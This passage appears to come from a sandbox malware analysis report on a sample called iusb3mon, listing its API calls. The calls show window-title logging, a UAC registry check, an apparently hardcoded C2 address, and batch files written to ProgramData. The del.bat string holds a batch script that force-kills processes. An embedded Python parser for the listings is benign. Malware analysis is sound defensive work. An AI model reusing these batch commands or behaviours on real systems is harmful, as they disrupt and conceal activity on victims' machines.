• Instruction Fuzzy Hash: 1A5106319247028FDBB0CB28DC8CB6977E1BB22328F16867CCDA69B2D1D7349845CB51
APIs
• VirtualAlloc.KERNEL32(?,?,00002000,00000004,00000000,?,?,?,?,?,062436CC,?,?,?,062420F0,?), ref: 06247DFE
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000), ref: 06247E0E
• GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000,00000000,?), ref: 06247E1F
• HeapAlloc.KERNEL32(00000000,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000,00000000,?,?), ref: 06247E26
• VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000), ref: 06247E4A
• VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000), ref: 06247E59
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Alloc$Virtual$Heap$Process
• String ID:
• API String ID: 2020977634-0
• Opcode ID: 95d8226c38939363bd70866f443bb236c99ee2468b9e90ba9974b9c55ff39707
• Instruction ID: 7d669132bd3b3955810cade031a20be0e1d94a36834226e0aeabdf083533e785
• Opcode Fuzzy Hash: 95d8226c38939363bd70866f443bb236c99ee2468b9e90ba9974b9c55ff39707
• Instruction Fuzzy Hash: 17316071A10306AFE7A8AFA9CD85E6B7BA8EF08750F100519FA15D7681D7B0ED40CB64
APIs
• GetForegroundWindow.USER32(?,00000000,00000258), ref: 06242B2F
• GetWindowTextA.USER32(00000000,062720CC,00000400), ref: 06242B3D
• lstrlenA.KERNEL32(062720CC), ref: 06242B73
• GetLocalTime.KERNEL32(?), ref: 06242B81
• wsprintfA.USER32 ref: 06242BB2
  • Part of subcall function 06242A59: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 06242A71
  • Part of subcall function 06242A59: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06242AC4
  • Part of subcall function 06242A59: GetFileSize.KERNEL32(00000000,00000000), ref: 06242AD1
  • Part of subcall function 06242A59: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06242AE3
  • Part of subcall function 06242A59: lstrlenA.KERNEL32(06242DCE,?,00000000), ref: 06242AF1
  • Part of subcall function 06242A59: WriteFile.KERNEL32(00000000,06242DCE,00000000), ref: 06242AFC
  • Part of subcall function 06242A59: CloseHandle.KERNEL32(00000000), ref: 06242B03
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$Windowlstrlen$CloseCreateFolderForegroundHandleLocalPathPointerSizeSpecialTextTimeWritewsprintf
• String ID:
• API String ID: 3540613261-0
• Opcode ID: 7f7ef9437ee86e17a77e15d3661d91ba7387b3cc1cf44b60d71a616a2772959a
• Instruction ID: 7fd3322532bc67327b83a3bda6d887d6dfaf86fc08e96d5afff72ad8d714e480
• Opcode Fuzzy Hash: 7f7ef9437ee86e17a77e15d3661d91ba7387b3cc1cf44b60d71a616a2772959a
• Instruction Fuzzy Hash: EC2162B2911219BADB60ABA5DC48FEF77ACAB48305F0000A1FB44E2141D6389B84CB75
APIs
• RegOpenKeyExA.ADVAPI32(80000002,06247870,00000000,00020019,06247870,00000000,0000009C,00000000,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 0624769D
• RegQueryValueExA.ADVAPI32(06247870,?,00000000,80000002,00000000,?,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 062476BD
• RegQueryValueExA.ADVAPI32(06247870,?,00000000,00000000,00000000,?,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 062476E2
• RegCloseKey.ADVAPI32(06247870,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 062476F3
• RegCloseKey.ADVAPI32(06247870,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 06247700
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: CloseQueryValue$Open
• String ID:
• API String ID: 4082589901-0
• Opcode ID: 3e37dfc5226fdb9127bfc0c20490da6bc693f5fa74cfe71e75e90986656cfda2
• Instruction ID: 36048949641c581700469049888a293a8ebb09193bd4d0712d2941000731cf60
• Opcode Fuzzy Hash: 3e37dfc5226fdb9127bfc0c20490da6bc693f5fa74cfe71e75e90986656cfda2
• Instruction Fuzzy Hash: D111257551020ABFDF15AF55EC48CAF3BBAEF89350B104466FE25A6120DB31AE10EB60
APIs
• __EH_prolog.LIBCMT ref: 06259DF0
• GetClassInfoA.USER32(?,?,?), ref: 06259E0B
• RegisterClassA.USER32(00000004), ref: 06259E16
• lstrcatA.KERNEL32(00000034,?,00000001), ref: 06259E4D
• lstrcatA.KERNEL32(00000034,?), ref: 06259E5B
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: Classlstrcat$H_prologInfoRegister
• String ID:
• API String ID: 106226465-0
• Opcode ID: 5e797ee3b175491e75fcdc1ede344cec241146e1213cef8ec1626df98253fe9b
• Instruction ID: 471ff739b5212189d777139477b596de3d6cacf08f7aad94607ac7d6c12466ad
• Opcode Fuzzy Hash: 5e797ee3b175491e75fcdc1ede344cec241146e1213cef8ec1626df98253fe9b
• Instruction Fuzzy Hash: DA112136A20345BEDBB0AF64EC00AEE7BB8AF05600F02451AED56A3150D77096418A61
APIs
• __EH_prolog.LIBCMT ref: 062413AA
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 062413CD
• CloseHandle.KERNEL32(?), ref: 062413E9
• CloseHandle.KERNEL32(?), ref: 062413EE
• WSACleanup.WS2_32 ref: 062413F0
  • Part of subcall function 0624180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
  • Part of subcall function 0624180D: CancelIo.KERNEL32(?,?,?,?,0624560D), ref: 0624183B
  • Part of subcall function 0624180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06241847
  • Part of subcall function 0624180D: closesocket.WS2_32(?), ref: 06241850
  • Part of subcall function 0624180D: SetEvent.KERNEL32(?,?,?,?,0624560D), ref: 06241859
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Similarity
• API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
• String ID:
• API String ID: 1476891362-0
• Opcode ID: df288cffeaf665cf93c3a28e086ffc4d4b1ce0f65ad7fff5fd4c2f5b3944274f
• Instruction ID: ad0c6a88848de802d0e4d648c5641570a89b36c2cd4f035cf0721e133def24e4
• Opcode Fuzzy Hash: df288cffeaf665cf93c3a28e086ffc4d4b1ce0f65ad7fff5fd4c2f5b3944274f
• Instruction Fuzzy Hash: 08010030821795DFC769FB24DE087AEBBF4AF00364F200A0CD8A252AD0CBB06A15CF51
APIs
• GetLastError.KERNEL32(00000000,00000000,0624DE63,0624DDE8,00000000,0624B401,00000000,00000000,00000000,?,06248D56,?,?,06248CE2,?,?), ref: 0624CDA3
• TlsGetValue.KERNEL32(?,06248D56,?,?,06248CE2,?,?,?), ref: 0624CDB1
• SetLastError.KERNEL32(00000000,?,06248D56,?,?,06248CE2,?,?,?), ref: 0624CDFD
  • Part of subcall function 0625005D: HeapAlloc.KERNEL32(00000008,06248D56,00000000,00000000,00000000,00000000,00000000,?,06248D56,?,?,06248CE2,?,?,?), ref: 06250153
• TlsSetValue.KERNEL32(00000000,?,06248D56,?,?,06248CE2,?,?,?), ref: 0624CDD5
• GetCurrentThreadId.KERNEL32 ref: 0624CDE6
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Similarity
• API ID: ErrorLastValue$AllocCurrentHeapThread
• String ID:
• API String ID: 2020098873-0
• Opcode ID: e1b9320525fb839e6f7a579752df6f1692172749efdd6d2993ba2ecc78496572
• Instruction ID: c764b2ae1f836d14ae67bbb686ffd5d360d16105d0cb0e590deee5c2f851747d
• Opcode Fuzzy Hash: e1b9320525fb839e6f7a579752df6f1692172749efdd6d2993ba2ecc78496572
• Instruction Fuzzy Hash: 7FF09636B557129BD6753B38BC0C61A3E66EF416B1B028525FEA6A61D0DF7088018B91
APIs
• DeleteCriticalSection.KERNEL32(00000000,?,?,0624CD75,0624B68C,0624B6E5,?,?,?), ref: 0624CFBC
  • Part of subcall function 0624B2B4: HeapFree.KERNEL32(00000000,00000000,00000000,06248D56,00000000,?,06250113,00000009,00000000,00000000,00000000,00000000,00000000,?,06248D56,?), ref: 0624B388
• DeleteCriticalSection.KERNEL32(?,?,0624CD75,0624B68C,0624B6E5,?,?,?), ref: 0624CFD7
• DeleteCriticalSection.KERNEL32 ref: 0624CFDF
• DeleteCriticalSection.KERNEL32 ref: 0624CFE7
• DeleteCriticalSection.KERNEL32 ref: 0624CFEF
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Similarity
• API ID: CriticalDeleteSection$FreeHeap
• String ID:
• API String ID: 447823528-0
• Opcode ID: f08fa989a6def0316041463758250286147a0e24095cd6641db0dcb99e3ab10c
• Instruction ID: 6a1f4361254af0dc0f6bcd06255567fcc52bc555dda36168ac96fee39eb8650a
• Opcode Fuzzy Hash: f08fa989a6def0316041463758250286147a0e24095cd6641db0dcb99e3ab10c
• Instruction Fuzzy Hash: B9F0892BF2F295558AFC3A1FFC8C84D6A52AF803603178036FDD456070C5154C80CF95
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
• CancelIo.KERNEL32(?,?,?,?,0624560D), ref: 0624183B
• InterlockedExchange.KERNEL32(?,00000000), ref: 06241847
• closesocket.WS2_32(?), ref: 06241850
• SetEvent.KERNEL32(?,?,?,?,0624560D), ref: 06241859
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Similarity
• API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
• String ID:
• API String ID: 1486965892-0
• Opcode ID: a224462a5afa160f4ccafb917e0f886a97d46c70cc9673e4323a591c937074b8
• Instruction ID: d44b117bd72a88ea5e28e51f15ddc0c2a3a263870d2dc1e2c968054466503e60
• Opcode Fuzzy Hash: a224462a5afa160f4ccafb917e0f886a97d46c70cc9673e4323a591c937074b8
• Instruction Fuzzy Hash: 75F03A31000716BFDB309B95EC0EA9A7BB9FF04314F104568F3C2915E0DBB2AA449F50
APIs
• GetMenuCheckMarkDimensions.USER32 ref: 0625CACC
• CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0625CB7B
• LoadBitmapA.USER32(00000000,00007FE3), ref: 0625CB93
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Similarity
• API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
• String ID:
• API String ID: 2596413745-3916222277
• Opcode ID: 9d16b6da1874f56682fbc800bee5c391e144e54a44ae58127ab9f6756b9f29e0
• Instruction ID: d33b0670ec446b873721bbbc960179b2e4276da8090460476360c760278390ce
• Opcode Fuzzy Hash: 9d16b6da1874f56682fbc800bee5c391e144e54a44ae58127ab9f6756b9f29e0
• Instruction Fuzzy Hash: B2212871E10315AFEB20DB78DC88BAE7BB9EF40710F0601A9ED45EB281D6309644CB40
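The API listings in these function blocks are rendered for the report's web UI. To work with them in a script, for example to compare call sequences across functions or to decode the magic constants Joe Sandbox prints as raw hex, here is an added Python parser. It is not part of the Joe Sandbox report or tooling: the line grammar is inferred from the bullet lines on this page, the two embedded listings are copied verbatim from the 062413AA block above and the 001D202F block that follows, and the decoded values (SOL_SOCKET = 0xFFFF, SO_LINGER = 0x0080, 0xE06D7363 as the MSVC C++ exception code) are standard Windows constants rather than anything the report states.

```python
"""Parse Joe Sandbox function-level "APIs" listings into structured records.

Added example for this report page; it is not Joe Sandbox code.  The line
grammar is inferred from the rendered listings on this page, and the two
embedded listings are copied verbatim from the 062413AA and 001D202F blocks.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# One rendered bullet, in the three shapes that occur on this page:
#   "• setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832"
#   "• WSACleanup.WS2_32 ref: 062413F0"                    (no argument list)
#   "  • Part of subcall function 0624180D: closesocket.WS2_32(?), ref: 06241850"
_LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Windows values used below (not taken from the report).
SOL_SOCKET = 0xFFFF
SO_LINGER = 0x0080
MSVC_CXX_EXCEPTION = 0xE06D7363      # code raised by the MSVC C++ throw helper
EXCEPTION_NONCONTINUABLE = 0x1


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                   # int for a hex literal, None where Joe shows '?'
    ref: int                     # call-site address shown after "ref:"
    subcall_of: Optional[int]    # callee address for "Part of subcall function" lines


def parse_args(raw: Optional[str]) -> list:
    """'?,0000FFFF,00000080' -> [None, 0xFFFF, 0x80]; missing list -> []."""
    if not raw or not raw.strip():
        return []
    return [None if tok.strip() == "?" else int(tok, 16) for tok in raw.split(",")]


def parse_listing(text: str) -> list[ApiCall]:
    """Parse every bullet line; headers such as 'APIs' are skipped, malformed bullets raise."""
    calls: list[ApiCall] = []
    for line in text.splitlines():
        if "•" not in line:
            continue
        m = _LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised listing line: {line!r}")
        calls.append(ApiCall(
            api=m["api"],
            module=m["module"],
            args=parse_args(m["args"]),
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def describe(call: ApiCall) -> Optional[str]:
    """Decode the magic constants that appear in this sample's listings, else None."""
    a = call.args
    if call.api == "setsockopt" and len(a) >= 3 and a[1] == SOL_SOCKET and a[2] == SO_LINGER:
        return "setsockopt(SOL_SOCKET, SO_LINGER): linger set right before closesocket"
    if call.api == "RaiseException" and a and a[0] == MSVC_CXX_EXCEPTION:
        flags = "EXCEPTION_NONCONTINUABLE" if len(a) > 1 and a[1] == EXCEPTION_NONCONTINUABLE else "?"
        return f"RaiseException(0xE06D7363, {flags}): MSVC C++ throw, not a crash"
    return None


def summarize(calls: list[ApiCall]) -> dict:
    """Split direct calls from calls attributed to callees and collect decoded notes."""
    direct = [c.api for c in calls if c.subcall_of is None]
    inherited = sorted({c.api for c in calls if c.subcall_of is not None})
    notes = [n for n in (describe(c) for c in calls) if n is not None]
    return {"direct": direct, "inherited": inherited, "notes": notes}


# Copied from the 062413AA block above (socket teardown, with the 0624180D subcall).
LISTING_062413AA = """
APIs
• __EH_prolog.LIBCMT ref: 062413AA
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 062413CD
• CloseHandle.KERNEL32(?), ref: 062413E9
• CloseHandle.KERNEL32(?), ref: 062413EE
• WSACleanup.WS2_32 ref: 062413F0
  • Part of subcall function 0624180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
  • Part of subcall function 0624180D: CancelIo.KERNEL32(?,?,?,?,0624560D), ref: 0624183B
  • Part of subcall function 0624180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06241847
  • Part of subcall function 0624180D: closesocket.WS2_32(?), ref: 06241850
  • Part of subcall function 0624180D: SetEvent.KERNEL32(?,?,?,?,0624560D), ref: 06241859
"""

# Copied from the 001D202F block that follows (C++ throw inside the VC runtime).
LISTING_001D202F = """
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 001D202F
  • Part of subcall function 001D6F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,001D11FC,?,?,?,?,001D11FC,?,001FA814), ref: 001D6F94
"""

if __name__ == "__main__":
    for listing in (LISTING_062413AA, LISTING_001D202F):
        print(summarize(parse_listing(listing)))
```

Paste the bullet lines of any other function block into a string and feed it to parse_listing to get the same structure; the "Part of subcall function" lines are kept apart from the function's own calls because Joe Sandbox attributes them to the callee, which matters when you compare two functions' direct call sequences. Note that the WaitForSingleObject timeout in the 062413AA block is 0x000000FF (255 ms), not INFINITE, so the parser deliberately does not label it.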
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 001D202F
  • Part of subcall function 001D6F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,001D11FC,?,?,?,?,001D11FC,?,001FA814), ref: 001D6F94
Memory Dump Source
• Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
Similarity
• API ID: ExceptionRaise___std_exception_copy
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 3109751735-1866435925
APIs
• SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06244E9D
• DeleteFileA.KERNEL32(?), ref: 06244EE0
• Sleep.KERNEL32(000007D0), ref: 06244F0F
  • Part of subcall function 06244D89: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06244DBD
  • Part of subcall function 06244D89: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 06244E10
  • Part of subcall function 06244D89: GetFileSize.KERNEL32(00000000,00000000), ref: 06244E21
  • Part of subcall function 06244D89: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 06244E3C
  • Part of subcall function 06244D89: CloseHandle.KERNEL32(?), ref: 06244E59
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$FolderPathSpecial$CloseCreateDeleteHandleReadSizeSleep
• String ID: .dat
• API String ID: 4140139616-100240174
APIs
• __EH_prolog.LIBCMT ref: 0625622D
  • Part of subcall function 0624A00C: RaiseException.KERNEL32(06254592,00000000,?,0625F828,?,invalid string position,06254592,00000000,062617F8,?,invalid string position), ref: 0624A03A
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: ExceptionH_prologRaise
• String ID: ios::badbit set$ios::eofbit set$ios::failbit set
• API String ID: 3968804221-425934345
APIs
• GetCurrentProcess.KERNEL32(06246D67,202.79.169.178,0624ABA8,00000000,00000000,00000000,06246D67,00000000), ref: 0624ABE1
• TerminateProcess.KERNEL32(00000000), ref: 0624ABE8
• ExitProcess.KERNEL32 ref: 0624AC69
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID: 202.79.169.178
• API String ID: 1703294689-4186200246
APIs
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244C85
• WriteFile.KERNEL32(00000000,06265680,00001F53,?,00000000,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244C9D
• CloseHandle.KERNEL32(00000000,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244CAA
Strings
• C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 06244C75
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
• API String ID: 1065093856-3013772396
APIs
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,75920F00,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062429E4
• WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062429FC
• CloseHandle.KERNEL32(00000000,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06242A09
Strings
• @echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill , xrefs: 062429F6
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: @echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill
• API String ID: 1065093856-3151026013
APIs
  • Part of subcall function 06244C6F: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244C85
  • Part of subcall function 06244C6F: WriteFile.KERNEL32(00000000,06265680,00001F53,?,00000000,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244C9D
  • Part of subcall function 06244C6F: CloseHandle.KERNEL32(00000000,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244CAA
  • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
• WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 06245D7E
